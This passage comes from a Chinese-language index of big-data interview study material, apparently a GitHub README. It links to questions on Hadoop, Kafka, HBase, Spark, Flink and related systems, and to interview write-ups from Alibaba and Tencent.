[HDFS的block为什么是128M?增大或减小有什么影响?](https://github.com/MoRan1607/BigDataGuide/blob/master/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/HDFS%E7%9A%84block%E4%B8%BA%E4%BB%80%E4%B9%88%E6%98%AF128M%EF%BC%9F%E5%A2%9E%E5%A4%A7%E6%88%96%E5%87%8F%E5%B0%8F%E6%9C%89%E4%BB%80%E4%B9%88%E5%BD%B1%E5%93%8D%EF%BC%9F/HDFS%E7%9A%84block%E4%B8%BA%E4%BB%80%E4%B9%88%E6%98%AF128M%EF%BC%9F%E5%A2%9E%E5%A4%A7%E6%88%96%E5%87%8F%E5%B0%8F%E6%9C%89%E4%BB%80%E4%B9%88%E5%BD%B1%E5%93%8D.md) ##### 3、MapReduce [介绍下MapReduce](https://blog.csdn.net/qq_41544550/article/details/123674103) [MapReduce优缺点](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/Hadoop%E9%9D%A2%E8%AF%95%E9%A2%98%E6%80%BB%E7%BB%93/Hadoop/MapReduce%E4%BC%98%E7%BC%BA%E7%82%B9.md) [MapReduce工作原理(流程)](https://github.com/MoRan1607/BigDataGuide/blob/master/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/MapReduce%E5%B7%A5%E4%BD%9C%E5%8E%9F%E7%90%86%EF%BC%88%E6%B5%81%E7%A8%8B%EF%BC%89.pdf) [MapReduce压缩方式](https://github.com/MoRan1607/BigDataGuide/blob/master/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/MapReduce%E5%8E%8B%E7%BC%A9%E6%96%B9%E5%BC%8F.pdf) ##### 4、YARN [介绍下YARN](https://blog.csdn.net/qq_41544550/article/details/123826496?spm=1001.2014.3001.5501) #### 二、Zookeeper [介绍下Zookeeper是什么?](https://blog.csdn.net/qq_41544550/article/details/123148663) [Zookeeper有什么作用?优缺点?有什么应用场景?](https://blog.csdn.net/qq_41544550/article/details/123148688) [Zookeeper架构](https://github.com/MoRan1607/BigDataGuide/blob/master/Zookeeper/%E9%9D%A2%E8%AF%95%E9%A2%98/Zookeeper%E6%9E%B6%E6%9E%84.pdf) #### 三、Hive [说下为什么要使用Hive?Hive的优缺点?Hive的作用是什么?](https://blog.csdn.net/qq_41544550/article/details/123333839) [Hive的用户自定义函数实现步骤与流程](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/%E9%9D%A2%E8%AF%95%E9%A2%98/Hive%E7%9A%84%E7%94%A8%E6%88%B7%E8%87%AA%E5%AE%9A%E4%B9%89%E5%87%BD%E6%95%B0%E5%AE%9E%E7%8E%B0%E6%AD%A5%E9%AA%A4%E4%B8%8E%E6%B5%81%E7%A8%8B/Hive%E7%9A%84%E7%94%A8%E6%88%B7%E8%87%AA%E5%AE%9A%E4%B9%89%E5%87%BD%E6%95%B0%E5%AE%9E%E7%8E%B0%E6%AD%A5%E9%AA%A4%E4%B8%8E%E6%B5%81%E7%A8%8B.md) [Hive分区和分桶的区别](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/%E9%9D%A2%E8%AF%95%E9%A2%98/Hive%E7%9A%84%E7%94%A8%E6%88%B7%E8%87%AA%E5%AE%9A%E4%B9%89%E5%87%BD%E6%95%B0%E5%AE%9E%E7%8E%B0%E6%AD%A5%E9%AA%A4%E4%B8%8E%E6%B5%81%E7%A8%8B/Hive%E5%88%86%E5%8C%BA%E5%92%8C%E5%88%86%E6%A1%B6%E7%9A%84%E5%8C%BA%E5%88%AB.md) [Hive的cluster by 、sort by、distribute by 、order by 区别?](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/%E9%9D%A2%E8%AF%95%E9%A2%98/Hive%E7%9A%84%E7%94%A8%E6%88%B7%E8%87%AA%E5%AE%9A%E4%B9%89%E5%87%BD%E6%95%B0%E5%AE%9E%E7%8E%B0%E6%AD%A5%E9%AA%A4%E4%B8%8E%E6%B5%81%E7%A8%8B/Hive%E7%9A%84cluster%20by%20%E3%80%81sort%20by%E3%80%81distribute%20by%20%E3%80%81order%20by%20%E5%8C%BA%E5%88%AB%EF%BC%9F.pdf) [Hive count(distinct)有几个reduce,海量数据会有什么问题?](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/%E9%9D%A2%E8%AF%95%E9%A2%98/Hive%E7%9A%84%E7%94%A8%E6%88%B7%E8%87%AA%E5%AE%9A%E4%B9%89%E5%87%BD%E6%95%B0%E5%AE%9E%E7%8E%B0%E6%AD%A5%E9%AA%A4%E4%B8%8E%E6%B5%81%E7%A8%8B/Hive%20count(distinct)%E6%9C%89%E5%87%A0%E4%B8%AAreduce%EF%BC%8C%E6%B5%B7%E9%87%8F%E6%95%B0%E6%8D%AE%E4%BC%9A%E6%9C%89%E4%BB%80%E4%B9%88%E9%97%AE%E9%A2%98%EF%BC%9F.pdf) #### 四、Flume [介绍下Flume](https://blog.csdn.net/qq_41544550/article/details/123451528?spm=1001.2014.3001.5501) [Flume结构](https://github.com/MoRan1607/BigDataGuide/blob/master/Flume/%E9%9D%A2%E8%AF%95%E9%A2%98/Flume%E6%9E%B6%E6%9E%84/Flume%E6%9E%B6%E6%9E%84.md) #### 五、Kafka [介绍下Kafka,Kafka的作用?Kafka的组件?适用场景?](https://blog.csdn.net/qq_41544550/article/details/123534948) [Kafka实现高吞吐的原理?](https://github.com/MoRan1607/BigDataGuide/blob/master/Kafka/%E9%9D%A2%E8%AF%95%E9%A2%98/Kafka%E5%AE%9E%E7%8E%B0%E9%AB%98%E5%90%9E%E5%90%90%E7%9A%84%E5%8E%9F%E7%90%86.pdf) [Kafka的一条message中包含了哪些信息?](https://github.com/MoRan1607/BigDataGuide/blob/master/Kafka/%E9%9D%A2%E8%AF%95%E9%A2%98/Kafka%E7%9A%84%E4%B8%80%E6%9D%A1message%E4%B8%AD%E5%8C%85%E5%90%AB%E4%BA%86%E5%93%AA%E4%BA%9B%E4%BF%A1%E6%81%AF%EF%BC%9F.pdf) [Kafka的消费者和消费者组有什么区别?为什么需要消费者组?](https://github.com/MoRan1607/BigDataGuide/blob/master/Kafka/%E9%9D%A2%E8%AF%95%E9%A2%98/Kafka%E7%9A%84%E6%B6%88%E8%B4%B9%E8%80%85%E5%92%8C%E6%B6%88%E8%B4%B9%E8%80%85%E7%BB%84%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB%EF%BC%9F%E4%B8%BA%E4%BB%80%E4%B9%88%E9%9C%80%E8%A6%81%E6%B6%88%E8%B4%B9%E8%80%85%E7%BB%84%EF%BC%9F.pdf) [Kafka的ISR、OSR和ACK介绍,ACK分别有几种值?](https://github.com/MoRan1607/BigDataGuide/blob/master/Kafka/%E9%9D%A2%E8%AF%95%E9%A2%98/Kafka%E7%9A%84ISR%E3%80%81OSR%E5%92%8CACK%E4%BB%8B%E7%BB%8D%EF%BC%8CACK%E5%88%86%E5%88%AB%E6%9C%89%E5%87%A0%E7%A7%8D%E5%80%BC%EF%BC%9F.pdf) [Kafka怎么保证数据不丢失,不重复?](https://github.com/MoRan1607/BigDataGuide/blob/master/Kafka/%E9%9D%A2%E8%AF%95%E9%A2%98/Kafka%E6%80%8E%E4%B9%88%E4%BF%9D%E8%AF%81%E6%95%B0%E6%8D%AE%E4%B8%8D%E4%B8%A2%E5%A4%B1%EF%BC%8C%E4%B8%8D%E9%87%8D%E5%A4%8D%EF%BC%9F.pdf) [Kafka的单播和多播](https://github.com/MoRan1607/BigDataGuide/blob/master/Kafka/%E9%9D%A2%E8%AF%95%E9%A2%98/Kafka%E7%9A%84%E5%8D%95%E6%92%AD%E5%92%8C%E5%A4%9A%E6%92%AD.pdf) [说下Kafka的ISR机制](https://github.com/MoRan1607/BigDataGuide/blob/master/Kafka/%E9%9D%A2%E8%AF%95%E9%A2%98/%E8%AF%B4%E4%B8%8BKafka%E7%9A%84ISR%E6%9C%BA%E5%88%B6.pdf) #### 六、HBase [介绍下HBase架构](https://blog.csdn.net/qq_41544550/article/details/123583361) [HBase为什么查询快](https://github.com/MoRan1607/BigDataGuide/blob/master/HBase/%E9%9D%A2%E8%AF%95%E9%A2%98/HBase%E4%B8%BA%E4%BB%80%E4%B9%88%E6%9F%A5%E8%AF%A2%E5%BF%AB.pdf) [HBase的大合并、小合并是什么?](https://github.com/MoRan1607/BigDataGuide/blob/master/HBase/%E9%9D%A2%E8%AF%95%E9%A2%98/HBase%E7%9A%84%E5%A4%A7%E5%90%88%E5%B9%B6%E3%80%81%E5%B0%8F%E5%90%88%E5%B9%B6%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F.pdf) [HBase的rowkey设计原则](https://github.com/MoRan1607/BigDataGuide/blob/master/HBase/%E9%9D%A2%E8%AF%95%E9%A2%98/HBase%E7%9A%84rowkey%E8%AE%BE%E8%AE%A1%E5%8E%9F%E5%88%99.pdf) [HBase的一个region由哪些东西组成?](https://github.com/MoRan1607/BigDataGuide/blob/master/HBase/%E9%9D%A2%E8%AF%95%E9%A2%98/HBase%E7%9A%84%E4%B8%80%E4%B8%AAregion%E7%94%B1%E5%93%AA%E4%BA%9B%E4%B8%9C%E8%A5%BF%E7%BB%84%E6%88%90%EF%BC%9F.pdf) [HBase读写数据流程](https://github.com/MoRan1607/BigDataGuide/blob/master/HBase/%E9%9D%A2%E8%AF%95%E9%A2%98/HBase%E8%AF%BB%E5%86%99%E6%95%B0%E6%8D%AE%E6%B5%81%E7%A8%8B.pdf) [HBase的RegionServer宕机以后怎么恢复的?](https://github.com/MoRan1607/BigDataGuide/blob/master/HBase/%E9%9D%A2%E8%AF%95%E9%A2%98/HBase%E7%9A%84RegionServer%E5%AE%95%E6%9C%BA%E4%BB%A5%E5%90%8E%E6%80%8E%E4%B9%88%E6%81%A2%E5%A4%8D%E7%9A%84%EF%BC%9F.pdf) [HBase的读写缓存](https://github.com/MoRan1607/BigDataGuide/blob/master/HBase/%E9%9D%A2%E8%AF%95%E9%A2%98/HBase%E7%9A%84%E8%AF%BB%E5%86%99%E7%BC%93%E5%AD%98.pdf) #### 七、Spark [说下对RDD的理解?RDD特点、算子?](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/Spark%E9%9D%A2%E8%AF%95%E9%A2%98%E6%95%B4%E7%90%86/Spark/Pics/%E8%AF%B4%E4%B8%8B%E5%AF%B9RDD%E7%9A%84%E7%90%86%E8%A7%A3%EF%BC%9FRDD%E7%89%B9%E7%82%B9%E3%80%81%E7%AE%97%E5%AD%90/%E8%AF%B4%E4%B8%8B%E5%AF%B9RDD%E7%9A%84%E7%90%86%E8%A7%A3%EF%BC%9FRDD%E7%89%B9%E7%82%B9%E3%80%81%E7%AE%97%E5%AD%90.md) [Spark小文件问题](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/Spark%E9%9D%A2%E8%AF%95%E9%A2%98%E6%95%B4%E7%90%86/Spark/Spark%E5%B0%8F%E6%96%87%E4%BB%B6%E9%97%AE%E9%A2%98/Spark%E5%B0%8F%E6%96%87%E4%BB%B6%E9%97%AE%E9%A2%98.md) [Spark的内存模型](https://github.com/MoRan1607/BigDataGuide/blob/master/Spark/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E7%9A%84%E5%86%85%E5%AD%98%E6%A8%A1%E5%9E%8B/Spark%E7%9A%84%E5%86%85%E5%AD%98%E6%A8%A1%E5%9E%8B.md) [Spark的Job、Stage、Task分别介绍下,如何划分?](https://github.com/MoRan1607/BigDataGuide/blob/master/Spark/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E7%9A%84%E5%86%85%E5%AD%98%E6%A8%A1%E5%9E%8B/Spark%E7%9A%84Job%E3%80%81Stage%E3%80%81Task%E5%88%86%E5%88%AB%E4%BB%8B%E7%BB%8D%E4%B8%8B%EF%BC%8C%E5%A6%82%E4%BD%95%E5%88%92%E5%88%86.md) [Spark的RDD、DataFrame、DataSet、DataStream区别?](https://github.com/MoRan1607/BigDataGuide/blob/master/Spark/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E7%9A%84%E5%86%85%E5%AD%98%E6%A8%A1%E5%9E%8B/Spark%E7%9A%84RDD%E3%80%81DataFrame%E3%80%81DataSet%E3%80%81DataStream%E5%8C%BA%E5%88%AB%EF%BC%9F.pdf) [RDD的容错](https://github.com/MoRan1607/BigDataGuide/blob/master/Spark/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E7%9A%84%E5%86%85%E5%AD%98%E6%A8%A1%E5%9E%8B/RDD%E7%9A%84%E5%AE%B9%E9%94%99.pdf) [说下Spark中的Transform和Action,为什么Spark要把操作分为Transform和Action?](https://github.com/MoRan1607/BigDataGuide/blob/master/Spark/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E7%9A%84%E5%86%85%E5%AD%98%E6%A8%A1%E5%9E%8B/%E8%AF%B4%E4%B8%8BSpark%E4%B8%AD%E7%9A%84Transform%E5%92%8CAction%EF%BC%8C%E4%B8%BA%E4%BB%80%E4%B9%88Spark%E8%A6%81%E6%8A%8A%E6%93%8D%E4%BD%9C%E5%88%86%E4%B8%BATransform%E5%92%8CAction%EF%BC%9F.pdf) [Spark的任务执行流程](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/Spark%E9%9D%A2%E8%AF%95%E9%A2%98%E6%95%B4%E7%90%86/Spark%E7%9A%84%E4%BB%BB%E5%8A%A1%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B.pdf) [Spark的架构](https://github.com/MoRan1607/BigDataGuide/blob/master/Spark/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E7%9A%84%E6%9E%B6%E6%9E%84.pdf) #### 八、Flink [介绍下Flink](https://github.com/MoRan1607/BigDataGuide/blob/master/Flink/%E4%BB%8B%E7%BB%8D%E4%B8%8BFlink) [Flink架构](https://github.com/MoRan1607/BigDataGuide/blob/master/Flink/%E9%9D%A2%E8%AF%95%E9%A2%98/Flink%E6%9E%B6%E6%9E%84.pdf) #### 九、数仓面试题 [数据仓库和数据中台区别](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E6%95%B0%E4%BB%93/%E6%95%B0%E6%8D%AE%E4%BB%93%E5%BA%93%E5%92%8C%E6%95%B0%E6%8D%AE%E4%B8%AD%E5%8F%B0%E5%8C%BA%E5%88%AB.pdf) #### 十、综合面试题 [Spark和MapReduce之间的区别?各自优缺点?](https://github.com/MoRan1607/BigDataGuide/blob/master/Spark/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E7%9A%84%E5%86%85%E5%AD%98%E6%A8%A1%E5%9E%8B/Spark%E5%92%8CMapReduce%E4%B9%8B%E9%97%B4%E7%9A%84%E5%8C%BA%E5%88%AB%EF%BC%9F%E5%90%84%E8%87%AA%E4%BC%98%E7%BC%BA%E7%82%B9%EF%BC%9F.pdf) [Spark和Flink的区别](https://github.com/MoRan1607/BigDataGuide/blob/master/Flink/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E5%92%8CFlink%E7%9A%84%E5%8C%BA%E5%88%AB.pdf) 牛客网面经 --- ### 大数据面经 #### 阿里面经 [阿里巴巴 二面凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C%E5%B7%B4%E5%B7%B4%20%E4%BA%8C%E9%9D%A2%E5%87%89%E7%BB%8F.pdf) [阿里云大数据平台三面+HR面【已OC】](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C%E4%BA%91%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%B9%B3%E5%8F%B0%E4%B8%89%E9%9D%A2%2BHR%E9%9D%A2%E3%80%90%E5%B7%B2OC%E3%80%91.pdf) [阿里-数据研发-1面2面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-%E6%95%B0%E6%8D%AE%E7%A0%94%E5%8F%91-1%E9%9D%A22%E9%9D%A2.pdf) [4.23阿里数开一面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/4.23%E9%98%BF%E9%87%8C%E6%95%B0%E5%BC%80%E4%B8%80%E9%9D%A2.pdf) [分享一个大数据的面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E5%88%86%E4%BA%AB%E4%B8%80%E4%B8%AA%E5%A4%A7%E6%95%B0%E6%8D%AE%E7%9A%84%E9%9D%A2%E7%BB%8F.pdf) [十余家公司大数据开发面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E5%8D%81%E4%BD%99%E5%AE%B6%E5%85%AC%E5%8F%B8%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E9%9D%A2%E7%BB%8F.pdf) [大数据面经好少啊,我来写点](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F%E5%A5%BD%E5%B0%91%E5%95%8A%EF%BC%8C%E6%88%91%E6%9D%A5%E5%86%99%E7%82%B9.pdf) [提前批面经(Java_大数据)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E6%8F%90%E5%89%8D%E6%89%B9%E9%9D%A2%E7%BB%8F(Java_%E5%A4%A7%E6%95%B0%E6%8D%AE).pdf) [阿里-数据技术与产品部(两次简历面)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E9%98%BF%E9%87%8C-%E6%95%B0%E6%8D%AE%E6%8A%80%E6%9C%AF%E4%B8%8E%E4%BA%A7%E5%93%81%E9%83%A8%EF%BC%88%E4%B8%A4%E6%AC%A1%E7%AE%80%E5%8E%86%E9%9D%A2%EF%BC%89.pdf) [阿里云一二三面凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E9%98%BF%E9%87%8C%E4%BA%91%E4%B8%80%E4%BA%8C%E4%B8%89%E9%9D%A2%E5%87%89%E7%BB%8F.pdf) [阿里巴巴淘系大数据研发工程师三面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E9%98%BF%E9%87%8C%E5%B7%B4%E5%B7%B4%E6%B7%98%E7%B3%BB%E5%A4%A7%E6%95%B0%E6%8D%AE%E7%A0%94%E5%8F%91%E5%B7%A5%E7%A8%8B%E5%B8%88%E4%B8%89%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) [阿里集团大淘宝一面凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E9%98%BF%E9%87%8C%E9%9B%86%E5%9B%A2%E5%A4%A7%E6%B7%98%E5%AE%9D%E4%B8%80%E9%9D%A2%E5%87%89%E7%BB%8F.pdf) [阿里巴巴 二面凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C%E5%B7%B4%E5%B7%B4%20%E4%BA%8C%E9%9D%A2%E5%87%89%E7%BB%8F.pdf) #### 腾讯面经 [2022暑假实习 数据开发 字节 腾讯](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/2022%E6%9A%91%E5%81%87%E5%AE%9E%E4%B9%A0%20%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%20%E5%AD%97%E8%8A%82%20%E8%85%BE%E8%AE%AF%EF%BC%88%E5%B7%B2offer.pdf) [4.13 腾讯音乐数据工程笔试](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/4.13%20%E8%85%BE%E8%AE%AF%E9%9F%B3%E4%B9%90%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8B%E7%AC%94%E8%AF%95.pdf) [2024届秋招总结](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/2024%E5%B1%8A%E7%A7%8B%E6%8B%9B%E6%80%BB%E7%BB%93.pdf) [5.30腾讯数据开发一面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/5.30%E8%85%BE%E8%AE%AF%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E4%B8%80%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) [9.20-腾讯云智-数据-二面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/9.20-%E8%85%BE%E8%AE%AF%E4%BA%91%E6%99%BA-%E6%95%B0%E6%8D%AE-%E4%BA%8C%E9%9D%A2.pdf) [【腾讯】后端开发暑期实习面经(已offer)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E3%80%90%E8%85%BE%E8%AE%AF%E3%80%91%E5%90%8E%E7%AB%AF%E5%BC%80%E5%8F%91%E6%9A%91%E6%9C%9F%E5%AE%9E%E4%B9%A0%E9%9D%A2%E7%BB%8F%EF%BC%88%E5%B7%B2offer%EF%BC%89.pdf) [一面凉经-腾讯技术研究-数据科学](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E4%B8%80%E9%9D%A2%E5%87%89%E7%BB%8F-%E8%85%BE%E8%AE%AF%E6%8A%80%E6%9C%AF%E7%A0%94%E7%A9%B6-%E6%95%B0%E6%8D%AE%E7%A7%91%E5%AD%A6.pdf) [大数据开发实习面经(阿里、360、腾讯)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%AE%9E%E4%B9%A0%E9%9D%A2%E7%BB%8F%EF%BC%88%E9%98%BF%E9%87%8C%E3%80%81360%E3%80%81%E8%85%BE%E8%AE%AF%EF%BC%89.pdf) [奇怪的csig数据工程timeline](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E5%A5%87%E6%80%AA%E7%9A%84csig%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8Btimeline.pdf) [字节腾讯大数据凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E5%AD%97%E8%8A%82%E8%85%BE%E8%AE%AF%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%87%89%E7%BB%8F.pdf) [百度腾讯提前批阿里校招面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E7%99%BE%E5%BA%A6%E8%85%BE%E8%AE%AF%E6%8F%90%E5%89%8D%E6%89%B9%E9%98%BF%E9%87%8C%E6%A0%A1%E6%8B%9B%E9%9D%A2%E7%BB%8F.pdf) [腾讯 TEG 后台开发 大数据方向 一面总结](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%20TEG%20%E5%90%8E%E5%8F%B0%E5%BC%80%E5%8F%91%20%E5%A4%A7%E6%95%B0%E6%8D%AE%E6%96%B9%E5%90%91%20%E4%B8%80%E9%9D%A2%E6%80%BB%E7%BB%93.pdf) [腾讯 偏大数据开发三面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%20%E5%81%8F%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E4%B8%89%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) [腾讯 